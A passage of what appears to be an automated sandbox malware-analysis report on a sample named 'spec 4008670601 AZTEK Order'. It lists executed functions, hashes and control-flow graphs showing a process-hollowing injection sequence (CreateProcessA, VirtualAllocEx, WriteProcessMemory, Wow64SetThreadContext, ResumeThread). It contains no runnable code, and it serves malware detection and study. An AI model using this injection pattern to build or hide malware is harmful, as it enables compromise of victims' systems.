48840c0 29196->29197 29198 4882018 2 API calls 29196->29198 29199 4881f2c WriteProcessMemory 29196->29199 29200 4881f30 WriteProcessMemory 29196->29200 29197->29065 29198->29197 29199->29197 29200->29197 29201->29194 29202->29194 29204 4883e83 29203->29204 29205 4884319 29204->29205 29206 4882018 2 API calls 29204->29206 29207 4881f2c WriteProcessMemory 29204->29207 29208 4881f30 WriteProcessMemory 29204->29208 29205->29065 29206->29204 29207->29204 29208->29204 29210 4883ded 29209->29210 29212 4881478 ResumeThread 29210->29212 29213 4881470 ResumeThread 29210->29213 29214 4881521 2 API calls 29210->29214 29211 4883e1a 29211->29065 29212->29211 29213->29211 29214->29211 29217 4883b95 29215->29217 29216 4884319 29216->29065 29217->29216 29218 4882018 2 API calls 29217->29218 29219 4881f2c WriteProcessMemory 29217->29219 29220 4881f30 WriteProcessMemory 29217->29220 29218->29217 29219->29217 29220->29217 29223 4883aff 29221->29223 29222 4883b11 29225 48840c0 29222->29225 29228 4882018 2 API calls 29222->29228 29229 4881f2c WriteProcessMemory 29222->29229 29230 4881f30 WriteProcessMemory 29222->29230 29223->29222 29224 488409c 29223->29224 29226 4881a38 VirtualAllocEx 29223->29226 29227 4881a30 VirtualAllocEx 29223->29227 29225->29065 29226->29223 29227->29223 29228->29225 29229->29225 29230->29225 29232 4881fa6 WriteProcessMemory 29231->29232 29233 488201f ReadProcessMemory 29231->29233 29234 4881fcf 29232->29234 29236 48820af 29233->29236 29234->29112 29236->29112 29238 4881f78 WriteProcessMemory 29237->29238 29240 4881fcf 29238->29240 29240->29112 29242 4881f78 WriteProcessMemory 29241->29242 29244 4881fcf 29242->29244 29244->29112 29246 48813fe 29245->29246 29247 4881477 ResumeThread 29245->29247 29246->29118 29249 48814e9 29247->29249 29249->29118 29251 48814b8 ResumeThread 29250->29251 29253 48814e9 29251->29253 29253->29118 29255 48814ae ResumeThread 29254->29255 29256 4881527 Wow64SetThreadContext 29254->29256 29258 48814e9 29255->29258 29260 48815b5 29256->29260 29258->29118 29260->29118 29262 488206b ReadProcessMemory 29261->29262 29264 48820af 29262->29264 29264->29124 29266 4882086 ReadProcessMemory 29265->29266 29269 48820ff 29265->29269 29268 48820af 29266->29268 29268->29124 29269->29124 29271 4881a78 VirtualAllocEx 29270->29271 29273 4881ab5 29271->29273 29273->29129 29275 4881a37 VirtualAllocEx 29274->29275 29277 48819be 29274->29277 29278 4881ab5 29275->29278 29277->29129 29278->29129 29280 4882241 CreateProcessA 29279->29280 29282 4882403 29280->29282 29285 488213e 29283->29285 29284 4882140 29284->29162 29285->29284 29286 48823a6 CreateProcessA 29285->29286 29287 4882403 29286->29287 29289 488156d Wow64SetThreadContext 29288->29289 29291 48815b5 29289->29291 29291->29175 29292 4882630 29293 48825ce 29292->29293 29294 48825e3 29293->29294 29295 48835e8 15 API calls 29293->29295 29296 48835f8 15 API calls 29293->29296 29297 488365e 15 API calls 29293->29297 29295->29294 29296->29294 29297->29294 28995 b9acb0 28999 b9ada8 28995->28999 29007 b9ad97 28995->29007 28996 b9acbf 29000 b9adb9 28999->29000 29001 b9addc 28999->29001 29000->29001 29015 b9b031 29000->29015 29019 b9b040 29000->29019 29001->28996 29002 b9add4 29002->29001 29003 b9afe0 GetModuleHandleW 29002->29003 29004 b9b00d 29003->29004 29004->28996 29008 b9ada8 29007->29008 29010 b9addc 29008->29010 29013 b9b031 LoadLibraryExW 29008->29013 29014 b9b040 LoadLibraryExW 29008->29014 29009 b9add4 29009->29010 29011 b9afe0 GetModuleHandleW 29009->29011 29010->28996 29012 b9b00d 29011->29012 29012->28996 29013->29009 29014->29009 29016 b9b054 29015->29016 29017 b9b079 29016->29017 29023 b9a168 29016->29023 29017->29002 29020 b9b054 29019->29020 29021 b9a168 LoadLibraryExW 29020->29021 29022 b9b079 29020->29022 29021->29022 29022->29002 29024 b9b220 LoadLibraryExW 29023->29024 29026 b9b299 29024->29026 29026->29017

                                                      Executed Functions

                                                      Function 06DA3D50 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !Y3E
                                                      • API String ID: 0-2826621527
                                                      • Opcode ID: 8d8e43041a4732ccedd10fbcd9c770107c41e6e8e4f41a2596de768fb8c1c138
                                                      • Instruction ID: 1662f7e91572901f830aebb0858a8a6346566e904cfdfcba489ec58d166dac09
                                                      • Opcode Fuzzy Hash: 8d8e43041a4732ccedd10fbcd9c770107c41e6e8e4f41a2596de768fb8c1c138
                                                      • Instruction Fuzzy Hash: 3AA17D34B142088FDB489B79D85976E7AF3BFC8700F25806AE906EB395DE75DD018B81
                                                      Function 06DA72F0 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: T(z
                                                      • API String ID: 0-3184255237
                                                      • Opcode ID: 8d8d064083874f1d9766ef6cf9641e5d61af189f214b9dc481b3d83efc38a4be
                                                      • Instruction ID: 9dbc3e411670f1d05185bd8be3dc0a089d3510857dcb214df682faf8874e1448
                                                      • Opcode Fuzzy Hash: 8d8d064083874f1d9766ef6cf9641e5d61af189f214b9dc481b3d83efc38a4be
                                                      • Instruction Fuzzy Hash: 0441F931F19305CFEB889FB899516BF77B3EBC4600F10846AD952AB284CE30DD019792
                                                      Function 06DA877B Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: T(z
                                                      • API String ID: 0-3184255237
                                                      • Opcode ID: a7cc95f969ba5a8812e4e7365632ecba2d8b09549e1882a1bfa7a3fe826cfa23
                                                      • Instruction ID: 2e9eea896db836998cc7a9d2c97adf15f693882740bb968dbf6838072fb1529e
                                                      • Opcode Fuzzy Hash: a7cc95f969ba5a8812e4e7365632ecba2d8b09549e1882a1bfa7a3fe826cfa23
                                                      • Instruction Fuzzy Hash: 34412B32F18305CFEB988AB589556AFB7B7EBC8600F10C426D952BB384DE70CD019B91
                                                      Function 06DA8788 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: T(z
                                                      • API String ID: 0-3184255237
                                                      • Opcode ID: 9b7af8e8e3efba0bb15fddeb404d2e025962c4c1ea2bd6cfe9b0ff09aee5a2a9
                                                      • Instruction ID: 064084cbadcb0e3b64887d9dbbde84ebfe4540fc96be19e84f884170c1a378b4
                                                      • Opcode Fuzzy Hash: 9b7af8e8e3efba0bb15fddeb404d2e025962c4c1ea2bd6cfe9b0ff09aee5a2a9
                                                      • Instruction Fuzzy Hash: 37311A31F19315CFEB988AB589516BFB6B7EBC8600F10C42AD952BB284CE70CD019B91
                                                      Function 06DA8779 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: T(z
                                                      • API String ID: 0-3184255237
                                                      • Opcode ID: 74dcfab16a9577dbdc63e3bf9a26cc9567439bee167a165a0206c29471545780
                                                      • Instruction ID: 329f997a329127951d1fd8382b4fbd49d663db9bbe73dabc689dbf247c3950ce
                                                      • Opcode Fuzzy Hash: 74dcfab16a9577dbdc63e3bf9a26cc9567439bee167a165a0206c29471545780
                                                      • Instruction Fuzzy Hash: 7131E831F19315CFEBD88BB499516BFB6B7EBC8600F10D426D952AB284CE30CD419B92
                                                      Function 06DA3D42 Relevance: .3, Instructions: 278COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3caf275742bc063763d87efc90d19c7bee7a637fc71b7aecbc3502974e4aeea
                                                      • Instruction ID: 1133163e316a4fb75c6a09e80968d327c87a8c3e4b27acd47ddfbbacc6172a4f
                                                      • Opcode Fuzzy Hash: a3caf275742bc063763d87efc90d19c7bee7a637fc71b7aecbc3502974e4aeea
                                                      • Instruction Fuzzy Hash: 4BA18E34B14204CFDB449B79D859B6E7AF3BF88700F25846AE906EB395DE71DD018B80
                                                      Function 06DA0F89 Relevance: .3, Instructions: 272COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d09ebbfa309b87d12cd4c8f2f2a88835884d093ce7570075b316b82c3eca907
                                                      • Instruction ID: bce9271ed1b393fb155efad919cd7c06f3802bab079822dcc5047d57ec30e3f5
                                                      • Opcode Fuzzy Hash: 1d09ebbfa309b87d12cd4c8f2f2a88835884d093ce7570075b316b82c3eca907
                                                      • Instruction Fuzzy Hash: F4A13331208351CFD7A48F2ADC809AABBF2FF96314B56886AD4C2DB251C730DD15CB89
                                                      Function 06DA1060 Relevance: .2, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0bf92d7cb63e94f9be7fde330edd00057d6bee520059d9ad3f5fadfd815ace1b
                                                      • Instruction ID: 9b78584bf8f782e81653d1e0c246725b8c15ec769ff79cd0c8308508f0508e6a
                                                      • Opcode Fuzzy Hash: 0bf92d7cb63e94f9be7fde330edd00057d6bee520059d9ad3f5fadfd815ace1b
                                                      • Instruction Fuzzy Hash: 0461DF31218255CFD784CF29CD8562A7BB2FB85300F42846BE846EF2A1D731ED55CB89
                                                      Function 06DA3EE3 Relevance: .2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c3fb902e7d14e18e117c24075d14c8385257a66e6148c0d0cd12fa5e2d29e8c
                                                      • Instruction ID: 57a155efe254e98bb39752447c9648b16f3334b003e11c2c44d63ac39147af6b
                                                      • Opcode Fuzzy Hash: 8c3fb902e7d14e18e117c24075d14c8385257a66e6148c0d0cd12fa5e2d29e8c
                                                      • Instruction Fuzzy Hash: 80519E34B142049FDB589B74D859B6EBAF3BFC8700F258069E906EB395CE75DD418B40
                                                      Function 06DA7F18 Relevance: .1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c44e87be680986d63b886224c53d1d752dad82da8d647d15493f8eb7bd7e165
                                                      • Instruction ID: aa3858d9805bd5a2bef19b608c5ea447daedc58ffa7cee50c25b1c5d1293f7c0
                                                      • Opcode Fuzzy Hash: 3c44e87be680986d63b886224c53d1d752dad82da8d647d15493f8eb7bd7e165
                                                      • Instruction Fuzzy Hash: 8841A73AE0C219DFDB84CFA8C9404AEFBB6EF88210F10456AE555EB254D631CA418791
                                                      Function 06DA7F28 Relevance: .1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0fc9145db2b9c5e352a448edc7f8ef49bffdcd2def31a8059a701615efe7133
                                                      • Instruction ID: 3351743740b42a7f58de6657354f123b8d2507bc9650a82d603cc3f091e04cc9
                                                      • Opcode Fuzzy Hash: e0fc9145db2b9c5e352a448edc7f8ef49bffdcd2def31a8059a701615efe7133
                                                      • Instruction Fuzzy Hash: B041A739B1C219DFDB84CFA8C9404AEFBB6EFC8310B60446AE959EB254D631DE418791
                                                      Function 04881521 Relevance: 3.1, APIs: 2, Instructions: 99threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • ResumeThread.KERNELBASE ref: 048814DA
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 048815A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: Thread$ContextResumeWow64
                                                      • String ID:
                                                      • API String ID: 1826235168-0
                                                      • Opcode ID: 3fb78287f0ad4ac2cbd6b35e4bd20373853623ef01ad4080e000771fe65bc2e8
                                                      • Instruction ID: 935480f87df5c630422406989554267bb5421ba3a644ac16abbc08aad3898099
                                                      • Opcode Fuzzy Hash: 3fb78287f0ad4ac2cbd6b35e4bd20373853623ef01ad4080e000771fe65bc2e8
                                                      • Instruction Fuzzy Hash: C9315C71D003098FEB10DFAAC4857AEFBF1EF88324F14842DD519A7241CB78A545CB95
                                                      Function 04882018 Relevance: 3.1, APIs: 2, Instructions: 97injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 19 4882018-488201d 20 488201f-48820ad ReadProcessMemory 19->20 21 4881fa6-4881fcd WriteProcessMemory 19->21 29 48820af-48820b5 20->29 30 48820b6-48820e6 20->30 22 4881fcf-4881fd5 21->22 23 4881fd6-4882006 21->23 22->23 29->30
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04881FC0
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 048820A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcess$ReadWrite
                                                      • String ID:
                                                      • API String ID: 3589323503-0
                                                      • Opcode ID: 3de2436981e8613061591490d0040592d3778b2d1fa08f646a1f64ac5428d62d
                                                      • Instruction ID: 5eecfdcbd40bc0154d46117b61f9f9271319acab9eec6a43e85d6bc866f117c7
                                                      • Opcode Fuzzy Hash: 3de2436981e8613061591490d0040592d3778b2d1fa08f646a1f64ac5428d62d
                                                      • Instruction Fuzzy Hash: 133147728002498FDB10DFAAC884BEEFBF0FF88320F14882AE559A7251C7799555DB61
                                                      Function 048821AC Relevance: 1.8, APIs: 1, Instructions: 280processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 34 48821ac 35 48821ae-48821b5 34->35 36 488213e 35->36 37 48821b7-488224d 35->37 36->35 38 4882140-4882172 36->38 40 488224f-4882259 37->40 41 4882286-48822a6 37->41 50 488217b-48821a0 38->50 51 4882174-488217a 38->51 40->41 43 488225b-488225d 40->43 52 48822a8-48822b2 41->52 53 48822df-488230e 41->53 44 488225f-4882269 43->44 45 4882280-4882283 43->45 48 488226b 44->48 49 488226d-488227c 44->49 45->41 48->49 49->49 54 488227e 49->54 51->50 52->53 55 48822b4-48822b6 52->55 61 4882310-488231a 53->61 62 4882347-4882401 CreateProcessA 53->62 54->45 59 48822b8-48822c2 55->59 60 48822d9-48822dc 55->60 63 48822c4 59->63 64 48822c6-48822d5 59->64 60->53 61->62 66 488231c-488231e 61->66 76 488240a-4882490 62->76 77 4882403-4882409 62->77 63->64 64->64 65 48822d7 64->65 65->60 68 4882320-488232a 66->68 69 4882341-4882344 66->69 71 488232c 68->71 72 488232e-488233d 68->72 69->62 71->72 72->72 74 488233f 72->74 74->69 87 48824a0-48824a4 76->87 88 4882492-4882496 76->88 77->76 89 48824b4-48824b8 87->89 90 48824a6-48824aa 87->90 88->87 91 4882498 88->91 93 48824c8-48824cc 89->93 94 48824ba-48824be 89->94 90->89 92 48824ac 90->92 91->87 92->89 96 48824de-48824e5 93->96 97 48824ce-48824d4 93->97 94->93 95 48824c0 94->95 95->93 98 48824fc 96->98 99 48824e7-48824f6 96->99 97->96 100 48824fd 98->100 99->98 100->100
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 048823EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 5e2b201ef8a11b59858d894d684f010a802e7385458e3572098a7dd9b625c3ac
                                                      • Instruction ID: cfead23db84e723eda9137f121c2e689704dc562052545a461cc03d08e6deb6a
                                                      • Opcode Fuzzy Hash: 5e2b201ef8a11b59858d894d684f010a802e7385458e3572098a7dd9b625c3ac
                                                      • Instruction Fuzzy Hash: 71B14C71D002199FEF24DFA9C8417ADBBB2FF44314F148AA9E809E7250DB74A985CF91
                                                      Function 048821B8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 102 48821b8-488224d 104 488224f-4882259 102->104 105 4882286-48822a6 102->105 104->105 106 488225b-488225d 104->106 112 48822a8-48822b2 105->112 113 48822df-488230e 105->113 107 488225f-4882269 106->107 108 4882280-4882283 106->108 110 488226b 107->110 111 488226d-488227c 107->111 108->105 110->111 111->111 114 488227e 111->114 112->113 115 48822b4-48822b6 112->115 119 4882310-488231a 113->119 120 4882347-4882401 CreateProcessA 113->120 114->108 117 48822b8-48822c2 115->117 118 48822d9-48822dc 115->118 121 48822c4 117->121 122 48822c6-48822d5 117->122 118->113 119->120 124 488231c-488231e 119->124 133 488240a-4882490 120->133 134 4882403-4882409 120->134 121->122 122->122 123 48822d7 122->123 123->118 125 4882320-488232a 124->125 126 4882341-4882344 124->126 128 488232c 125->128 129 488232e-488233d 125->129 126->120 128->129 129->129 131 488233f 129->131 131->126 144 48824a0-48824a4 133->144 145 4882492-4882496 133->145 134->133 146 48824b4-48824b8 144->146 147 48824a6-48824aa 144->147 145->144 148 4882498 145->148 150 48824c8-48824cc 146->150 151 48824ba-48824be 146->151 147->146 149 48824ac 147->149 148->144 149->146 153 48824de-48824e5 150->153 154 48824ce-48824d4 150->154 151->150 152 48824c0 151->152 152->150 155 48824fc 153->155 156 48824e7-48824f6 153->156 154->153 157 48824fd 155->157 156->155 157->157
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 048823EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: b1db1b4d928f3b3b7a2d8930cd66e85f5c00b4024a4f28180af817f27fb8bce1
                                                      • Instruction ID: c3bd848b4d9f6c301feef66f6503d7c63b0a0d6d6f8a8f172e79ba2cb0138801
                                                      • Opcode Fuzzy Hash: b1db1b4d928f3b3b7a2d8930cd66e85f5c00b4024a4f28180af817f27fb8bce1
                                                      • Instruction Fuzzy Hash: 33913C71D006199FEF24DF68C8417ADBBB2FF48314F148AA9E809E7250DB74A985CF91
                                                      Function 00B9ADA8 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 159 b9ada8-b9adb7 160 b9adb9-b9adc6 call b9a100 159->160 161 b9ade3-b9ade7 159->161 168 b9adc8 160->168 169 b9addc 160->169 163 b9ade9-b9adf3 161->163 164 b9adfb-b9ae3c 161->164 163->164 170 b9ae49-b9ae57 164->170 171 b9ae3e-b9ae46 164->171 218 b9adce call b9b031 168->218 219 b9adce call b9b040 168->219 169->161 172 b9ae59-b9ae5e 170->172 173 b9ae7b-b9ae7d 170->173 171->170 175 b9ae69 172->175 176 b9ae60-b9ae67 call b9a10c 172->176 178 b9ae80-b9ae87 173->178 174 b9add4-b9add6 174->169 177 b9af18-b9af2f 174->177 180 b9ae6b-b9ae79 175->180 176->180 192 b9af31-b9af90 177->192 181 b9ae89-b9ae91 178->181 182 b9ae94-b9ae9b 178->182 180->178 181->182 183 b9aea8-b9aeaa call b9a11c 182->183 184 b9ae9d-b9aea5 182->184 188 b9aeaf-b9aeb1 183->188 184->183 190 b9aebe-b9aec3 188->190 191 b9aeb3-b9aebb 188->191 193 b9aee1-b9aeee 190->193 194 b9aec5-b9aecc 190->194 191->190 210 b9af92-b9af94 192->210 199 b9af11-b9af17 193->199 200 b9aef0-b9af0e 193->200 194->193 195 b9aece-b9aede call b9a12c call b9a13c 194->195 195->193 200->199 211 b9afc0-b9afd8 210->211 212 b9af96-b9afbe 210->212 213 b9afda-b9afdd 211->213 214 b9afe0-b9b00b GetModuleHandleW 211->214 212->211 213->214 215 b9b00d-b9b013 214->215 216 b9b014-b9b028 214->216 215->216 218->174 219->174
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9AFFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 8fc890bcab20685af218cb254953990690a3b0ac87f2f0bdf3b385e842baa5c5
                                                      • Instruction ID: c1cc084e4105ad395892a29829a960b369b9eb01050121457efefda20762575b
                                                      • Opcode Fuzzy Hash: 8fc890bcab20685af218cb254953990690a3b0ac87f2f0bdf3b385e842baa5c5
                                                      • Instruction Fuzzy Hash: B8815670A00B058FDB24DF2AD44175ABBF1FF88704F1089AED48ADBA51DB75E845CB91
                                                      Function 00B944E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 220 b944e0-b959d9 CreateActCtxA 223 b959db-b959e1 220->223 224 b959e2-b95a3c 220->224 223->224 231 b95a4b-b95a4f 224->231 232 b95a3e-b95a41 224->232 233 b95a51-b95a5d 231->233 234 b95a60 231->234 232->231 233->234 235 b95a61 234->235 235->235
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: c8457afc67b768fb30578ecc95c4c746e5af0f9daefe905da4cdac7b6f238470
                                                      • Instruction ID: 51698cb682b8760fd7db579e7ddd4a5fe69a1b734c69dfc4dab644af21c7bd7b
                                                      • Opcode Fuzzy Hash: c8457afc67b768fb30578ecc95c4c746e5af0f9daefe905da4cdac7b6f238470
                                                      • Instruction Fuzzy Hash: A841EEB0C0071DCBEB25DFA9C884B9EBBF1BF48714F20816AD409AB251DB716945CF90
                                                      Function 00B9590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 237 b9590c-b959d9 CreateActCtxA 239 b959db-b959e1 237->239 240 b959e2-b95a3c 237->240 239->240 247 b95a4b-b95a4f 240->247 248 b95a3e-b95a41 240->248 249 b95a51-b95a5d 247->249 250 b95a60 247->250 248->247 249->250 251 b95a61 250->251 251->251
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: e1d50927a2272c9a3f6154a8976b88b1f6dd6416feae22388bdc55cef142f03a
                                                      • Instruction ID: ba6598577bd5b19395520ccfaaffbc1bc90e72dcd340e8690bc6e4c909bd4c40
                                                      • Opcode Fuzzy Hash: e1d50927a2272c9a3f6154a8976b88b1f6dd6416feae22388bdc55cef142f03a
                                                      • Instruction Fuzzy Hash: D641EEB1C0071DCBEB25CFA9C98479DBBF1BF48714F2081AAC409AB251DB716949CF50
                                                      Function 04881A30 Relevance: 1.6, APIs: 1, Instructions: 90memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 253 4881a30-4881a35 254 48819be-4881a00 253->254 255 4881a37-4881ab3 VirtualAllocEx 253->255 258 4881a0a 254->258 259 4881a02-4881a08 254->259 262 4881abc-4881ae1 255->262 263 4881ab5-4881abb 255->263 261 4881a0d-4881a22 258->261 259->261 263->262
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04881AA6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 43b0c2e50b3a6d41d803bf150f34fe9ac10fecde054b3f8a77f0a2d5fa7ec7dc
                                                      • Instruction ID: c387989431c0fc122c1fed0b39f0ba6fe53eea8961b57c2084316ff9f7f673e1
                                                      • Opcode Fuzzy Hash: 43b0c2e50b3a6d41d803bf150f34fe9ac10fecde054b3f8a77f0a2d5fa7ec7dc
                                                      • Instruction Fuzzy Hash: 49314676A00249CFDB10DFA9D884AEEFBB0EF48320F24851AE519A7250CB75A941CF90
                                                      Function 048820F9 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                      Download Yara Rule

